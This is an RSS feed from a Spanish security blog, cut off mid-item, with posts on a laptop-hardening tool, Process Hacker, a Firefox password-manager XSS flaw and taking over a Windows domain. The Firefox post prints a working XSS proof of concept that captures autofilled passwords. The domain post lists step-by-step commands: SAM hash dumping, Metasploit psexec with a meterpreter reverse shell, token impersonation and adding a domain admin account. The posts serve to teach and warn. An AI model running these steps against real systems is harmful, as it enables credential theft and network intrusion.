<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
><channel><title>La Comunidad DragonJAR &#187; Administrador</title> <atom:link href="http://www.dragonjar.org/tag/administrador/feed" rel="self" type="application/rss+xml" /><link>http://www.dragonjar.org</link> <description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description> <lastBuildDate>Sat, 11 Feb 2012 01:08:12 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.1</generator> <item><title>LapSec &#8211; Asegura tu Laptop con un Click</title><link>http://www.dragonjar.org/lapsec-asegura-tu-laptop-con-un-click.xhtml</link> <comments>http://www.dragonjar.org/lapsec-asegura-tu-laptop-con-un-click.xhtml#comments</comments> <pubDate>Sat, 28 Aug 2010 14:21:59 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Noticias Hardware]]></category> <category><![CDATA[Administrador]]></category> <category><![CDATA[Computador]]></category> <category><![CDATA[Hispasec]]></category> <category><![CDATA[Portatil]]></category> <category><![CDATA[Portátiles]]></category> <category><![CDATA[Recursos]]></category> <category><![CDATA[Windows]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4865</guid> <description><![CDATA[LapSec (Laptop Securer), es una herramienta destinada a automatizar los cambios más aconsejables para asegurar Windows en un ordenador portátil. Básicamente, agrupa en un solo botón varias tareas. No está destinado a asegurar &#8220;por completo&#8221; un sistema, sino que pretende facilitar las modificaciones más importantes para un &#8220;bastionado&#8221; de ordenador portátil, mucho más susceptible de [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2010/09/LapSecss.png" width="240" title="LapSec   Asegura tu Laptop con un Click" alt="LapSecss LapSec   Asegura tu Laptop con un Click" /></p><p>LapSec (Laptop Securer), es una herramienta destinada a automatizar los cambios más aconsejables para asegurar <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">Windows</a> en un ordenador portátil. Básicamente, agrupa en un solo botón varias tareas. No está destinado a asegurar &#8220;por completo&#8221; un sistema, sino que pretende facilitar las modificaciones más importantes para un &#8220;bastionado&#8221; de ordenador portátil, mucho más susceptible de ser perdido o sustraído. Evidentemente, estas medidas también son útiles para un ordenador de sobremesa. También es importante destacar que hay más medidas de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> aplicables a un portátil en particular y Windows en general, pero que no han sido implementadas en LapSec por resultar medidas más &#8220;genéricas&#8221; que se salen del objetivo del programa: activar funcionalidades de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> Windows especialmente útiles para <a
href="http://www.dragonjar.org/tag/portatiles" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Portátiles">portátiles</a>.</p><p
style="text-align: center;"><img
class="alignnone" title="Seguridad en el portatil" src="http://www.dragonjar.org/wp-content/uploads/2010/09/LapSecss.png" alt="LapSecss LapSec   Asegura tu Laptop con un Click" width="478" height="387" /><span
id="more-4865"></span></p><p>Fue desarrollado por Marcin &#8220;Icewall&#8221; Noga, parte del equipo de <a
href="http://www.dragonjar.org/tag/hispasec" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Hispasec">Hispasec</a> con el objetivo principal de proteger nuestro portátil para que nadie acceda al sistema operativo, que la información confidencial quede inaccesible y que permita realizar un cifrado seguro, a continuación les dejo la lista de funcionalidades completa:</p><ul><li>Eliminar el cifrado LM de las <a
href="http://www.dragonjar.org/tag/contrasenas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Contraseñas">contraseñas</a> (en Vista y 7 no es necesario).</li><li>Sobrescribir el archivo de memoria paginada (pagefile.sys)</li><li>Ocultar el nombre del usuario que el Sistema Operativo muestra en la pantalla de presentación</li><li>Activar la protección por contraseña del salvapantallas.</li><li>Eliminar la autoejecución de archivos cuando se introducen unidades extraíbles.</li><li>Comprobar la existencia de contraseña del usuario.</li><li>Comprobar la complejidad de las contraseñas.</li><li>Comprueba la activación de la contraseña en la consola de recuperación.</li><li>Deshabilitar el almacenamiento de contraseñas en el navegador Internet Explorer.</li><li>Deshabilitar la hibernación (hibernation.sys).</li><li>Deshabilitar la cuenta de <a
href="http://www.dragonjar.org/tag/administrador" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Administrador">administrador</a> y de invitado del sistema.</li><li>Cifrado de la carpeta Mis Documentos.</li><li>Exportación del certificado de forma sencilla para casos de &#8220;desastre&#8221;.</li></ul><h2 style="text-align: center;"><a
href="http://blog.hispasec.com/laboratorio/recursos/lapsec_beta.exe">Descargar LapSec para Asegurar tu Computador Portatil</a></h2><p><strong>Mas Información:</strong><br
/> <a
href="http://blog.hispasec.com/laboratorio/364">Pagina Oficial de LapSec</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/adeona-rastrea-tu-portatil-robado.xhtml" title="Adeona &#8211; Rastrea tu Portatil Robado">Adeona &#8211; Rastrea tu Portatil Robado</a></li><li><a
href="http://www.dragonjar.org/importar-musica-del-iphone-o-ipod-touch-al-disco-duro.xhtml" title="Importar Musica del iPhone o iPod Touch al Disco Duro">Importar Musica del iPhone o iPod Touch al Disco Duro</a></li><li><a
href="http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml" title="¿Cómo tomar control de un Dominio en Windows?">¿Cómo tomar control de un Dominio en Windows?</a></li><li><a
href="http://www.dragonjar.org/process-hacker-mata-procesos-en-windows.xhtml" title="Process Hacker, Mata Procesos en Windows">Process Hacker, Mata Procesos en Windows</a></li><li><a
href="http://www.dragonjar.org/gestionando-las-impresiones-en-mac-windows-y-gnu-linux.xhtml" title="Gestionando las impresiones en MAC, Windows y GNU Linux">Gestionando las impresiones en MAC, Windows y GNU Linux</a></li><li><a
href="http://www.dragonjar.org/prey-rastrea-tu-computador-robado.xhtml" title="Prey &#8211; Rastrea tu Computador Robado">Prey &#8211; Rastrea tu Computador Robado</a></li><li><a
href="http://www.dragonjar.org/protege-tu-computador-portatil-poniendole-una-alarma.xhtml" title="Protege tu Computador Portatil Poniéndole una Alarma">Protege tu Computador Portatil Poniéndole una Alarma</a></li><li><a
href="http://www.dragonjar.org/winautopwn-ataques-automaticos-de-entornos-windows.xhtml" title="winAUTOPWN &#8211; Ataques automáticos de entornos Windows">winAUTOPWN &#8211; Ataques automáticos de entornos Windows</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/lapsec-asegura-tu-laptop-con-un-click.xhtml/feed</wfw:commentRss> <slash:comments>2</slash:comments> </item> <item><title>Robando claves por XSS del Administrador de Contraseñas del Firefox</title><link>http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml</link> <comments>http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml#comments</comments> <pubDate>Tue, 16 Mar 2010 06:51:50 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Administrador]]></category> <category><![CDATA[Clave]]></category> <category><![CDATA[Contrasena]]></category> <category><![CDATA[Contraseñas]]></category> <category><![CDATA[Inyección]]></category> <category><![CDATA[Mozilla Firefox]]></category> <category><![CDATA[NoScript]]></category> <category><![CDATA[Password]]></category> <category><![CDATA[Passwords]]></category> <category><![CDATA[Robar]]></category> <category><![CDATA[Robo]]></category> <category><![CDATA[XSS]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4045</guid> <description><![CDATA[Gracias a un mensaje de Tom Brennan, me entero de un problema en el Administrador de Contraseñas del Mozilla Firefox, que permite a un atacante mediante XSS (Cross-site scripting) obtener la clave de un usuario almacenada en el navegador. El problema se encuentra en que el administrador de contraseñas del Mozilla Firefox , no valida [...]]]></description> <content:encoded><![CDATA[<p>Gracias a un mensaje de <a
href="http://twitter.com/brennantom/status/10554441500">Tom Brennan</a>, me entero de un problema en el Administrador de <a
href="http://www.dragonjar.org/tag/contrasenas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Contraseñas">Contraseñas</a> del <a
href="http://www.dragonjar.org/tag/mozilla-firefox" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Mozilla Firefox">Mozilla Firefox</a>, que permite a un atacante mediante <a
href="http://www.dragonjar.org/tag/xss" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con XSS">XSS</a> (<a
href="http://es.wikipedia.org/wiki/Cross-site_scripting">Cross-site scripting</a>) obtener la <a
href="http://www.dragonjar.org/tag/clave" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Clave">clave</a> de un usuario almacenada en el navegador.</p><p
style="text-align: center;"><img
class="alignnone" title="XSS Robo de claves" src="http://farm5.static.flickr.com/4069/4436827535_c045e2fae3.jpg" alt="4436827535 c045e2fae3 Robando claves por XSS del Administrador de Contraseñas del Firefox" width="500" height="325" /></p><p>El problema se encuentra en que el administrador de contraseñas del Mozilla Firefox , no valida adecuadamente el formulario desde el cual se guarda la clave en el administrador de contraseñas, por lo tanto si a la pagina donde se encuentra el formulario de logueo se le puede realizar un XSS es posible agregar un formulario con un campo oculto del tipo &#8220;<a
href="http://www.dragonjar.org/tag/password" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Password">password</a>&#8221; y al acceder a ella, firefox no solo llenara el formulario real de acceso automáticamente, sino también el formulario oculto que acabamos de inyectar.<span
id="more-4045"></span></p><p
style="text-align: center;"><img
class="alignnone" title="Robar contraseñas firefox" src="http://farm5.static.flickr.com/4049/4436827733_71f2f3e6d4.jpg" alt="4436827733 71f2f3e6d4 Robando claves por XSS del Administrador de Contraseñas del Firefox" width="498" height="111" /></p><p>Si le echamos un vistoso al formulario utilizando el plugin <a
href="http://chrispederick.com/work/web-developer/">Web Developer</a> para el Mozilla Firefox, encontramos que efectivamente el Administrador de Contraseñas, nos llenó el formulario oculto que colocamos en la pagina mediante XSS con nuestra clave de acceso:</p><p
style="text-align: center;"><img
class="alignnone" title="Robar contraseñas" src="http://farm3.static.flickr.com/2736/4437603194_2c7c33f317_o.jpg" alt="4437603194 2c7c33f317 o Robando claves por XSS del Administrador de Contraseñas del Firefox" width="500" height="351" /></p><p>El código utilizado para <a
href="http://www.dragonjar.org/tag/robar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Robar">robar</a> la información del Administrador de contraseñas en el Mozilla Firefox:</p><blockquote><p><code>&lt;script&gt; document.write('&lt;form&gt;&lt;input id=p type=password style=visibility:hidden&gt;&lt;/form&gt;'); setTimeout('alert("Password: " + document.getElementById("p").value)', 100); &lt;/script&gt;</code></p></blockquote><p>Podemos modificar el formulario para que nos envié la contraseña capturada a un archivo en el que puede ser almacenada o enviada por correo electrónico, pero en esta prueba de concepto no lo realizaremos.</p><p>En este caso contar con &#8220;clave maestra&#8221; en el administrador de contraseñas del Mozilla Firefox no supone una &#8220;barrera&#8221; para que obtengan nuestras claves, ya que una vez ingresada la clave maestra, el Firefox llenara de todas formas el formulario con nuestra clave.</p><p>Aunque posiblemente una técnica similar pueda funcionar en otros navegadores, he realizado pruebas en Google Chrome, Safari y Opera siendo el Mozilla Firefox el único afectado.</p><p><strong>Actualización:</strong><br
/> Un fallo similar fue <a
href="https://bugzilla.mozilla.org/show_bug.cgi?id=359675">reportado en el 2006 y supuestamente fue resuelto &#8220;VERIFIED FIXED&#8221;,</a> pero acabo de probar con <a
href="http://www.oftedal.no/~erlend/test/">la prueba de concepto que publicaron en esa ocasión</a> y sigue siendo vulnerable.</p><h2>Recomendaciones:</h2><ul><li>Escribe &#8220;about:config&#8221; en la barra del Firefox para desactivar (poner en &#8220;false&#8221;) la función signon.autofillForms</li><p><img
class="alignnone" title="Deshabilitar auto llenado firefox" src="http://farm3.static.flickr.com/2721/4440250942_f1df42de73.jpg" alt="4440250942 f1df42de73 Robando claves por XSS del Administrador de Contraseñas del Firefox" width="500" height="130" /></p><p>Con esto deshabilitas la función de auto llenado del administrador de contraseñas y evitarnos ser victimas de este fallo.</p><li>Utilizar el plugin <a
title="Enlace permanente a NoScript" rel="bookmark" href="../noscript.xhtml">NoScript</a> (si no hay <a
href="http://www.dragonjar.org/tag/inyeccion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Inyección">inyección</a> de código, no hay problema)</li><li>No utilizar el Administrador de Contraseñas de Mozilla Firefox (<a
href="http://www.dragonjar.org/recupera-contrasenas-almacenadas-en-tu-navegador.xhtml">ya hemos demostrado que no es recomendable, ni en firefox, ni en ningún navegador</a>), en vez de el <a
href="http://lastpass.com/">utilizar servicios gratuitos como LastPass</a> (al que por cierto le debo un articulo entero)</li></ul><p><strong>Mas Información:</strong><br
/> <a
href="http://ha.ckers.org/weird/xss-password-manager.html">XSS demo for stealing passwords from the Firefox password manager</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/cambia-tu-clave-maestra-en-lastpass.xhtml" title="Cambia tu clave maestra en LastPass">Cambia tu clave maestra en LastPass</a></li><li><a
href="http://www.dragonjar.org/como-recuperar-una-cuenta-de-twitter.xhtml" title="¿Cómo Recuperar una Cuenta de Twitter? ">¿Cómo Recuperar una Cuenta de Twitter? </a></li><li><a
href="http://www.dragonjar.org/como-recuperar-una-cuenta-de-facebook.xhtml" title="¿Cómo Recuperar una Cuenta de Facebook?">¿Cómo Recuperar una Cuenta de Facebook?</a></li><li><a
href="http://www.dragonjar.org/los-peores-passwords-en-espanol.xhtml" title="Las peores Contraseñas en Español">Las peores Contraseñas en Español</a></li><li><a
href="http://www.dragonjar.org/clavehotmail-com-cometiendo-delitos-desde-el-2007.xhtml" title="ClaveHotmail.com cometiendo delitos desde el 2007">ClaveHotmail.com cometiendo delitos desde el 2007</a></li><li><a
href="http://www.dragonjar.org/diccionarios-para-realizar-ataques-de-fuerza-bruta.xhtml" title="Diccionario claves WPA para Realizar Ataques de Fuerza Bruta">Diccionario claves WPA para Realizar Ataques de Fuerza Bruta</a></li><li><a
href="http://www.dragonjar.org/recupera-tu-password-de-filezilla.xhtml" title="Recupera tu Password de FileZilla">Recupera tu Password de FileZilla</a></li><li><a
href="http://www.dragonjar.org/diccionarios-con-passwords-de-sitios-expuestos.xhtml" title="Diccionarios con Passwords de Sitios Expuestos">Diccionarios con Passwords de Sitios Expuestos</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml/feed</wfw:commentRss> <slash:comments>13</slash:comments> </item> <item><title>¿Cómo tomar control de un Dominio en Windows?</title><link>http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml</link> <comments>http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml#comments</comments> <pubDate>Wed, 17 Feb 2010 20:07:39 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Documentacion]]></category> <category><![CDATA[Administrador]]></category> <category><![CDATA[BackTrack]]></category> <category><![CDATA[Contraseñas]]></category> <category><![CDATA[Dominios]]></category> <category><![CDATA[Metasploit]]></category> <category><![CDATA[meterpreter]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[Windows]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3886</guid> <description><![CDATA[Los &#8220;dominios&#8221; en windows, facilitan muchas de las tareas a la hora de administrar una red, ya que permite realizar una agrupación lógica de servidores de red y otros ordenadores, para compartir  información común sobre cuentas  y seguridad, pero es una practica muy común (aunque poco recomendada) que los administradores de estos dominios reutilicen la [...]]]></description> <content:encoded><![CDATA[<p>Los &#8220;<a
href="http://www.dragonjar.org/tag/dominios" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Dominios">dominios</a>&#8221; en <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">windows</a>, facilitan muchas de las tareas a la hora de administrar una red, ya que permite realizar     una agrupación lógica de servidores de red y otros ordenadores, para compartir  información común sobre cuentas  y <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a>, pero es una practica muy común (aunque poco recomendada) que los administradores de estos dominios reutilicen la <a
href="http://www.dragonjar.org/tag/clave" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Clave">clave</a> que usan para el usuario <a
href="http://www.dragonjar.org/tag/administrador" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Administrador">administrador</a> de un equipo en los dominios de windows.</p><p
style="text-align: center;"><img
class="alignnone" title="hackear dominio en windows" src="http://img517.imageshack.us/img517/3070/dominio.jpg" alt="dominio ¿Cómo tomar control de un Dominio en Windows?" width="502" height="425" /></p><p>En el siguiente video vamos a ver como  tomar el control de un dominio en windows, cuando se presenta el caso de Reutilización de <a
href="http://www.dragonjar.org/tag/contrasenas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Contraseñas">contraseñas</a> comentado anteriormente:<span
id="more-3886"></span></p><p>REQUISITOS</p><ul><li>Tener acceso a una maquina miembro del dominio (para sacar el hash del usuario)</li><li>Todos los usuarios &#8220;administrador&#8221; de las maquinas miembros del dominio tienen la misma clave</li><li>Conocer la ip desde la que se loguea el administrador del dominio (puedes conseguirla de muchas formas, una de ellas es la ing. social)</li><li>Una copia de <a
href="../http://www.dragonjar.org/backtrack-4-final.xhtml">BackTrack 4</a></li></ul><p>Teniendo los requisitos listo, pasamos a realizar los pasos para tomar el control de un dominio en Windows:</p><p
style="text-align: center;"><object
classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param
name="allowFullScreen" value="true" /><param
name="allowScriptAccess" value="always" /><param
name="src" value="http://www.youtube.com/v/fIQQD193Hvc&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" /><param
name="allowfullscreen" value="true" /><embed
type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/fIQQD193Hvc&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p><p>Como vemos, fácilmente hemos agregado un usuario administrador a la lista de &#8220;administradores de dominio&#8221; simplemente siguiendo estos pasos:</p><ul><li><strong>mount /dev/sda1 /mnt/sda1</strong><br
/> Montamos la particion de la maquina windows</li><li><strong>cd /mnt/sda1/WINDOWS/system32/config</strong><br
/> accedemos a la carpeta dodne se encuentra el archivo SAM</li><li><strong>samdump2 system SAM</strong><br
/> sacamos los hash de los usuarios en la maquina windows</li><li><strong>msfconsole</strong><br
/> ejecutamos el <a
href="http://www.dragonjar.org/tag/metasploit" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Metasploit">metasploit</a> por consola</li><li><strong>use windows/smb/psexec</strong><br
/> utilizamos el psexec</li><li><strong>exploit -p windows/<a
href="http://www.dragonjar.org/tag/meterpreter" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con meterpreter">meterpreter</a>/reverse_tcp -o</strong><br
/> utilizamos la shell meterpreter</li><li><strong>LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass=  123&#8230;:5654&#8230; -j</strong><br
/> configuramos las opciones del exploit</li><li><strong>sessions -i 1</strong><br
/> una vez aparezca exitoso el ataque lanzamos la sesión donde se encuentra</li><li><strong>use incognito</strong><br
/> utilizamos el modulo incognito de meterpreter</li><li><strong>list_tokens -u</strong><br
/> mostramos los tokens</li><li><strong>impersonate_token mydomain\\domainadmin</strong><br
/> tomamos las credenciales del administrador de dominio</li><li><strong>execute -f cmd.exe -i -t</strong><br
/> lanzamos la consola de windows</li><li><strong>net user hack MPass5678 /add /domain</strong><br
/> Agregamos el usuario &#8220;hack&#8221; con clave &#8220;MPass46782&#8243; al dominio</li><li><strong>net group &#8220;Domain Admins&#8221; hack /add /domain</strong><br
/> metemos el usuario hack al grupo de administradores de dominio</li><li>Ya hemos tomado el control del dominio de windows</li></ul><p>Este ataque es compatible con  WinXP/Vista/Win7/Windows Server2k3/Windows  Server 2k7 y muestra lo sensible que es reutilizar las contraseñas en nuestro sistema, sin importar que tan &#8220;complejas&#8221; sean.</p><p>PD. en <a
href="http://securitytube.net/How-to-own-a-Windows-Domain-video.aspx">Securitytube.net existe un vídeo en el que realizan este mismo procedimiento</a> un poco mas &#8220;a mano&#8221; pero que puede servirnos también en nuestro proceso de aprendizaje.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/multiples-distribuciones-de-seguridad-en-tu-usb-con-katana.xhtml" title="Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB">Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB</a></li><li><a
href="http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml" title="Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida">Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida</a></li><li><a
href="http://www.dragonjar.org/katana-multiples-distribuciones-de-seguridad-en-tu-usb.xhtml" title="Katana &#8211; Múltiples Distribuciones de Seguridad en tu USB">Katana &#8211; Múltiples Distribuciones de Seguridad en tu USB</a></li><li><a
href="http://www.dragonjar.org/manual-de-metasploit-framework.xhtml" title="Curso Completo de Metasploit Framework">Curso Completo de Metasploit Framework</a></li><li><a
href="http://www.dragonjar.org/winautopwn-ataques-automaticos-de-entornos-windows.xhtml" title="winAUTOPWN &#8211; Ataques automáticos de entornos Windows">winAUTOPWN &#8211; Ataques automáticos de entornos Windows</a></li><li><a
href="http://www.dragonjar.org/asi-fue-el-hacking-day-en-medellin-pentesting-con-backtrack.xhtml" title="Así fue el Hacking Day en Medellín &#8211; Pentesting con Backtrack">Así fue el Hacking Day en Medellín &#8211; Pentesting con Backtrack</a></li><li><a
href="http://www.dragonjar.org/como-funcionan-y-se-crackean-las-claves-en-sistemas-windows.xhtml" title="Cómo funcionan y se crackean las claves en sistemas Windows">Cómo funcionan y se crackean las claves en sistemas Windows</a></li><li><a
href="http://www.dragonjar.org/backtrack-5.xhtml" title="BackTrack 5">BackTrack 5</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml/feed</wfw:commentRss> <slash:comments>3</slash:comments> </item> <item><title>Process Hacker, Mata Procesos en Windows</title><link>http://www.dragonjar.org/process-hacker-mata-procesos-en-windows.xhtml</link> <comments>http://www.dragonjar.org/process-hacker-mata-procesos-en-windows.xhtml#comments</comments> <pubDate>Sat, 26 Sep 2009 00:25:54 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Software]]></category> <category><![CDATA[Administrador]]></category> <category><![CDATA[aplicaciones]]></category> <category><![CDATA[Hacker]]></category> <category><![CDATA[Matar]]></category> <category><![CDATA[Memoria]]></category> <category><![CDATA[Microsoft]]></category> <category><![CDATA[Open Source]]></category> <category><![CDATA[Processos]]></category> <category><![CDATA[Windows]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3133</guid> <description><![CDATA[Process Hacker es un administrador de procesos para windows, totalmente libre y open source, algo así como un &#8220;administrador de tareas&#8221; con esteroídes, ya que permite ver procesos ocultos, editar la memoria del sistema, matar procesos que el &#8220;administrador de tareas&#8221; de windows no permite entre otras funciones muy útiles. Existen muchos programas de este [...]]]></description> <content:encoded><![CDATA[<p>Process <a
href="http://www.dragonjar.org/tag/hacker" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Hacker">Hacker</a> es un <a
href="http://www.dragonjar.org/tag/administrador" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Administrador">administrador</a> de procesos para <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">windows</a>, totalmente libre y <a
href="http://www.dragonjar.org/tag/open-source" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Open Source">open source</a>, algo así como un &#8220;administrador de tareas&#8221; con esteroídes, ya que permite ver procesos ocultos, editar la <a
href="http://www.dragonjar.org/tag/memoria" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Memoria">memoria</a> del sistema, <a
href="http://www.dragonjar.org/tag/matar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Matar">matar</a> procesos que el &#8220;administrador de tareas&#8221; de windows no permite entre otras funciones muy útiles.</p><p
style="text-align: center;"><img
class="alignnone" src="http://farm3.static.flickr.com/2615/3963722573_bf73d04029_o.jpg" alt="3963722573 bf73d04029 o Process Hacker, Mata Procesos en Windows" width="444" height="287" title="Process Hacker, Mata Procesos en Windows" /></p><p>Existen muchos programas de este tipo, uno de los mas populares es el <a
href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx">Process Explorer</a> de la empresa sysinternals que fue comprada por <a
href="http://www.dragonjar.org/tag/microsoft" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Microsoft">Microsoft</a>, precisamente por esa compra process explorer ha perdido adeptos (aunque no calidad) y muchos han optado por alternativas totalmente libres como Process Hacker.<span
id="more-3133"></span></p><p>A diferencia de otros administradores de tareas, Process Hacker cuenta con su propio drivers para manejar los procesos del sistema, lo que le permite matar procesos incluso si estos están siendo utilizados por el sistema operativo u otras <a
href="http://www.dragonjar.org/tag/aplicaciones" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con aplicaciones">aplicaciones</a>, esta funcionalidad también le permite ver procesos que pueden estar ocultos al &#8220;administrador de tareas&#8221; de windows, pero no solo podemos ver y eliminar procesos, también podemos realizar las mismas tareas con los servicios del sistema, podemos ver que <a
href="http://www.dragonjar.org/tag/aplicaciones" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con aplicaciones">aplicaciones</a> están haciendo uso de nuestra conexión y con quien se están comunicando.</p><p>Sólo funciona en Windows XP o superior de 32 bits y requiere del .NET Framework 2.0. En las versiones de 64 bits su funcionalidad se ve enormemente reducida a causa de que sólo son permitidos drivers firmados con un certificado digital válido emitido por una entidad de confianza, por lo que si deseamos poder cargar el driver de Process Hacker deberemos deshabilitar esta característica que viene por defecto en los sistemas de 64 bits.</p><p
style="text-align: center;"><a
href="http://sourceforge.net/projects/processhacker/files/processhacker/">Descargar Process Hacker, excelente administrador de Procesos en Microsoft Windows</a></p><p><strong>Para Mas Información:</strong><br
/> <a
href="http://processhacker.sourceforge.net/">Pagina Oficial del Process Hacker</a><br
/> <a
href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx">Pagina Oficial del Process Explorer</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/actualiza-tu-software-con-secunia-personal-software-inspector.xhtml" title="Actualiza tu software con Secunia Personal Software Inspector ">Actualiza tu software con Secunia Personal Software Inspector </a></li><li><a
href="http://www.dragonjar.org/la-anti-tesis-del-cofee.xhtml" title="Herramienta Anti Forense para Windows">Herramienta Anti Forense para Windows</a></li><li><a
href="http://www.dragonjar.org/denegacion-de-servicio-desde-el-wordpad.xhtml" title="Denegacion de Servicio desde el WordPad">Denegacion de Servicio desde el WordPad</a></li><li><a
href="http://www.dragonjar.org/wude-3-0.xhtml" title="WUDE 3.0">WUDE 3.0</a></li><li><a
href="http://www.dragonjar.org/actualiza-tu-equipo-con-windows.xhtml" title="Actualiza tu equipo con Windows">Actualiza tu equipo con Windows</a></li><li><a
href="http://www.dragonjar.org/como-funcionan-y-se-crackean-las-claves-en-sistemas-windows.xhtml" title="Cómo funcionan y se crackean las claves en sistemas Windows">Cómo funcionan y se crackean las claves en sistemas Windows</a></li><li><a
href="http://www.dragonjar.org/dll-hijacking-con-metasploit.xhtml" title="DLL Hijacking con Metasploit">DLL Hijacking con Metasploit</a></li><li><a
href="http://www.dragonjar.org/lapsec-asegura-tu-laptop-con-un-click.xhtml" title="LapSec &#8211; Asegura tu Laptop con un Click">LapSec &#8211; Asegura tu Laptop con un Click</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/process-hacker-mata-procesos-en-windows.xhtml/feed</wfw:commentRss> <slash:comments>6</slash:comments> </item> <item><title>Reseteo Remoto del Password de Admin en WordPress</title><link>http://www.dragonjar.org/reseteo-remoto-del-password-de-admin-en-wordpress.xhtml</link> <comments>http://www.dragonjar.org/reseteo-remoto-del-password-de-admin-en-wordpress.xhtml#comments</comments> <pubDate>Wed, 12 Aug 2009 04:36:49 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Administrador]]></category> <category><![CDATA[Password]]></category> <category><![CDATA[Vulnerabilidad]]></category> <category><![CDATA[WordPress]]></category><guid
